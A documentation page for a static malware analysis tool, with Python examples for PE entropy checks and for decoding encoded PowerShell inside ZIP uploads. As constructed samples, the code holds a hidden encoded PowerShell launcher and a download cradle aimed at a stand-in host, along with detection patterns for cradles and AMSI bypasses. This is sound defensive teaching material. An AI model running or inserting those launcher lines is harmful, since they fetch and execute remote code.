capability
Analysis
#security
#malware
#static
#no-ai

Static Malware Analysis

Static malware analysis inspects code and binaries without executing them. Decoder runs it on your upload with its own rule engine, with no LLM in the loop, and surfaces suspicious patterns, entropy spikes and known indicators. No API key required.

What it is

Pattern-, structure- and entropy-based inspection of code and compiled artefacts performed without executing them.

Why it's useful

Catches obfuscation, packed sections, suspicious imports and known-bad strings cheaply and deterministically, before a sandbox or a human reviewer.

How Decoder implements it

Decoder parses the upload (single file, ZIP, PE binary) server-side, runs language-aware heuristics, computes entropy per section, scans for IoCs, and produces a structured report with severity and rationale.
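The following is an added example, not Decoder's code, of the two static checks named above that a reviewer most often wants to see spelled out: walking a PE section table and computing Shannon entropy per section, plus a strings-level scan for suspicious API names and an encoded PowerShell launcher. The 7.0 bits/byte threshold, the API list, the rule names and severities are assumptions chosen for illustration, and the PE image is constructed inline (just enough header to parse; it is not a runnable executable).

```python
"""Per-section entropy and string-based IoC heuristics over a PE section table (added example)."""
import base64
import hashlib
import math
import re
import struct
from collections import Counter

ENTROPY_HIGH = 7.0  # bits/byte; packed or encrypted data sits near 8.0 (assumed threshold)
SUSPICIOUS_APIS = [  # names a strings scan sees in an import table or a resolver stub (assumed list)
    b"VirtualAlloc", b"VirtualProtect", b"WriteProcessMemory", b"CreateRemoteThread", b"URLDownloadToFileA",
]
ENCODED_PS = re.compile(  # powershell ... -enc <base64>, anywhere on one line (assumed pattern)
    rb"powershell(?:\.exe)?\s[^\r\n]*?-(?:encodedcommand|enc|e)\s+[A-Za-z0-9+/=]{16,}", re.I)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant run, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(blob: bytes):
    """Walk MZ -> e_lfanew -> PE\\0\\0 -> COFF header -> section table and yield (name, raw bytes).
    Every offset is bounds-checked so a hostile header cannot make the parser read past the file."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    if coff + 20 > len(blob):
        raise ValueError("truncated COFF header")
    num_sections = struct.unpack_from("<H", blob, coff + 2)[0]   # NumberOfSections
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]      # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    for i in range(num_sections):
        off = table + 40 * i
        if off + 40 > len(blob):
            raise ValueError("section table runs past end of file")
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, off)
        if raw_ptr + raw_size > len(blob):
            raise ValueError(f"section {name!r} points past end of file")
        yield name.rstrip(b"\0").decode("ascii", "replace"), blob[raw_ptr:raw_ptr + raw_size]


def analyze(blob: bytes) -> list:
    """Produce structured findings (severity, section, rule, rationale) without executing anything."""
    findings = []
    for name, data in pe_sections(blob):
        h = shannon_entropy(data)
        if h >= ENTROPY_HIGH:
            findings.append({"severity": "High", "section": name, "rule": "high-entropy-section",
                             "rationale": f"entropy {h:.2f} bits/byte suggests packing or encryption"})
        for api in SUSPICIOUS_APIS:
            if api in data:
                findings.append({"severity": "Medium", "section": name, "rule": "suspicious-import-string",
                                 "rationale": f"references {api.decode()}, common in injection and download stubs"})
        m = ENCODED_PS.search(data)
        if m:
            findings.append({"severity": "High", "section": name, "rule": "encoded-powershell",
                             "rationale": f"embedded launcher {m.group(0)[:48]!r}..."})
    return findings


def build_sample_pe(sections) -> bytes:
    """Constructed minimal PE image: DOS stub (0x40 bytes) -> PE signature -> 20-byte COFF header with
    no optional header -> section table -> 512-byte-aligned raw data. Enough to parse, not to run."""
    e_lfanew, opt_size, align = 0x40, 0, 0x200
    headers_end = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    raw_base = (headers_end + align - 1) // align * align
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    table, body = b"", b""
    for i, (name, data) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), 0x1000 * (i + 1),
                             len(data), raw_base + len(body), 0, 0, 0, 0, 0x60000020)
        body += data.ljust((len(data) + align - 1) // align * align, b"\0")
    image = dos + b"PE\0\0" + coff + table
    return image.ljust(raw_base, b"\0") + body


# Constructed section contents, not taken from any real binary.
_ENC = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16-le"))
SAMPLE_SECTIONS = [
    (b".text", b"\x90" * 200 + b"\xcc" * 50 + b"VirtualAlloc\0WriteProcessMemory\0"),   # low entropy, two APIs
    (b".data", b"cmd /c powershell.exe -nop -w hidden -enc " + _ENC + b"\0"),           # encoded launcher
    (b".packed", b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))),     # stand-in for packed data
]

if __name__ == "__main__":
    for f in analyze(build_sample_pe(SAMPLE_SECTIONS)):
        print(f"[{f['severity']}] {f['section']:<8} {f['rule']}: {f['rationale']}")
```

The bounds checks in `pe_sections` are the part worth copying: a crafted `NumberOfSections` or `PointerToRawData` is the classic way to crash a naive parser, and a triage tool that parses hostile uploads must treat every header field as attacker-controlled.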

When to use it

Triage of untrusted uploads, CI gating, pre-execution checks on customer artefacts, IR enrichment on a sample.

When NOT to use it

When you need runtime behaviour (C2 traffic, persistence, encryption activity), or when a sample is packed so that only the unpacker stub is readable statically: pair it with a dynamic sandbox.

Practical example

A LockBit 3.0 dropper uploaded as a ZIP: Decoder flagged the high-entropy section, the suspicious Win32 imports and the encoded PowerShell stage without executing anything.
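An added example, not Decoder's code, of the last step in that walk-through and of the ZIP ingestion it depends on: the archive is opened with traversal and size guards before any entry is read, and the `-EncodedCommand` argument of a PowerShell launcher is decoded (base64 of UTF-16LE) so that the download cradle hidden behind it can be matched statically, which a scan of the literal text alone would miss. The per-entry limits, rule names and regexes are assumptions, and the archive and its payload are constructed inline.

```python
"""ZIP ingestion with hardening guards plus encoded-PowerShell stage decoding (added example)."""
import base64
import io
import posixpath
import re
import zipfile

MAX_ENTRY_BYTES = 8 * 1024 * 1024   # assumed per-entry ceiling
MAX_INFLATE_RATIO = 100             # assumed zip-bomb ceiling (uncompressed / compressed)
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_PATTERNS = [  # assumed patterns for download cradles, IEX and AMSI tampering
    ("download-cradle", re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I)),
    ("invoke-expression", re.compile(r"Invoke-Expression|\bIEX\b", re.I)),
    ("amsi-bypass", re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I)),
]


def safe_entries(zip_bytes: bytes):
    """Yield (path, bytes) for file entries, rejecting traversal, absolute paths and oversized or
    suspiciously well-compressed entries before a single byte of content is read."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            norm = posixpath.normpath(name)
            if (name.startswith(("/", "\\")) or "\\" in name or re.match(r"[A-Za-z]:", name)
                    or norm == ".." or norm.startswith("../") or "\0" in name):
                raise ValueError(f"rejected unsafe entry path {name!r}")
            if info.file_size > MAX_ENTRY_BYTES:
                raise ValueError(f"rejected oversized entry {name!r} ({info.file_size} bytes)")
            if info.compress_size and info.file_size / info.compress_size > MAX_INFLATE_RATIO:
                raise ValueError(f"rejected entry {name!r}: inflate ratio looks like a zip bomb")
            yield norm, zf.read(info)


def decode_stages(script: str) -> list:
    """Decode every -EncodedCommand argument found in the script text (base64 of UTF-16LE)."""
    stages = []
    for m in ENCODED_ARG.finditer(script):
        try:
            stages.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; the literal text is still scanned
    return stages


def ps_findings(path: str, script: str) -> list:
    """Scan the literal script and each decoded stage; record which layer a pattern was found in."""
    findings = []
    layers = [("literal", script)] + [("decoded", s) for s in decode_stages(script)]
    for layer, text in layers:
        if layer == "decoded":
            findings.append({"path": path, "layer": "literal", "rule": "encoded-command", "decoded": text})
        for rule, pat in CRADLE_PATTERNS:
            if pat.search(text):
                findings.append({"path": path, "layer": layer, "rule": rule})
    return findings


def scan_zip(zip_bytes: bytes) -> list:
    """Ingest the archive through the guards and scan every .ps1 inside it."""
    findings = []
    for path, data in safe_entries(zip_bytes):
        if path.lower().endswith(".ps1"):
            findings.extend(ps_findings(path, data.decode("utf-8", "replace")))
    return findings


# Constructed payload: a second-stage cradle hidden behind -enc; the literal launcher shows no cradle.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"


def build_sample_zip(entry_name: str = "invoice/run.ps1") -> bytes:
    """Constructed in-memory archive holding one launcher script under entry_name."""
    encoded = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
    launcher = f"powershell.exe -nop -w hidden -enc {encoded}\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, launcher)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_sample_zip()):
        print(f)
```

The path guard runs on the normalised name and rejects both `../` components and absolute or drive-letter paths, so the only thing that ever reaches a scanner is content the archive index says lives inside the upload. Anything that fails a guard aborts the whole ingest rather than being silently skipped, which is the right default for a triage tool handling untrusted uploads.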

Glossary

Static analysis
Inspection of code or binaries without executing them.
Dynamic analysis
Observation of a program's behaviour while it runs in an isolated sandbox.
Entropy
Statistical measure of randomness; high entropy in a binary section often signals packing or encryption.
IoC
Indicator of Compromise — an artefact (hash, string, URL, registry key) associated with known malicious activity.
Dropper
Stage-one malware whose job is to deliver the real payload (carried inside it or fetched from a remote host) and execute it.

Related

capability
Binary (PE) Analysis

Decoder parses Windows PE binaries to expose the structural signals a reviewer needs: sections, imports, exports, per-section entropy and known IoCs.

concept
Entropy in Malware Analysis

Entropy is a statistical measure of how 'random' the bytes in a file look. In malware analysis, abnormally high entropy is a strong signal that a section is packed, encrypted or otherwise obfuscated.

format
PowerShell Script Analysis

PowerShell is the workhorse of Windows post-exploitation. Decoder reads `.ps1` files statically and surfaces the patterns attackers rely on: encoded commands, `Invoke-Expression`, download cradles, AMSI bypasses.

format
ZIP Archive Analysis

ZIPs are the most common way to ship code and one of the most abused ways to ship malware. Decoder ingests a ZIP server-side with hardened guards and exposes its content for review.

capability
AI-Origin Detection

AI-Origin Detection estimates whether a code artefact was likely produced by an LLM, and explains why. The goal is informed review, not gatekeeping.

capability
Repository Analysis

Repository Analysis turns a codebase into something you can read, search and interrogate. Upload a ZIP or import a public GitHub project; Decoder indexes structure, runs static checks and gates AI features behind your own key.

concept
Severity Scoring — How Decoder ranks findings

Severity tells you what to fix first. Decoder normalises every finding into Critical / High / Medium / Low using signal strength, exploitability, and project context.

concept
CWE Mapping — Mapping findings to MITRE CWE

CWE (Common Weakness Enumeration) is the MITRE taxonomy of software weaknesses. Decoder attaches a CWE ID where applicable so findings are comparable across tools and reports.

concept
YARA Rules — Pattern-based malware detection

YARA is a rule language used by malware analysts to describe families and behaviours. Decoder applies YARA-style heuristics during malware scans.

capability
Secret Detection — Finding leaked keys

Leaked credentials are among the most common breach vectors. Decoder combines provider-specific regex (AWS, GitHub, Stripe…) with entropy to flag secrets that don't belong in code.

capability
Dependency Analysis — Inspecting third-party code

Most code in any modern project isn't yours. Decoder reads manifests and lockfiles to map the dependency surface and flag suspicious entries.

concept
SAST — Static Application Security Testing

SAST inspects source code to find security weaknesses before runtime. Decoder ships SAST as a free, no-key feature across 20+ languages.

concept
Supply Chain Security — Trusting what you ship

Supply chain security is about trusting the code you didn't write. Decoder helps inventory and inspect that surface during analysis.

concept
LockBit 3.0 — Case study in Decoder

The leaked LockBit 3.0 source provided a real-world benchmark. This entry walks through what Decoder flags and why, and serves as a reference for ransomware patterns.

format
Python — Supported format

Python is a first-class format in Decoder. Upload a single .py, a ZIP, or import a GitHub repo and get static + malware findings.

format
JavaScript & TypeScript — Supported formats

JavaScript and TypeScript are first-class in Decoder. Upload single files, ZIPs, or import a GitHub repo.

format
Java — Supported format

Java is supported as a first-class format. Rules cover the common enterprise weakness classes mapped to CWE.

format
Dockerfile — Supported format

Dockerfiles are configuration that becomes runtime. Decoder flags the common foot-guns before they hit your registry.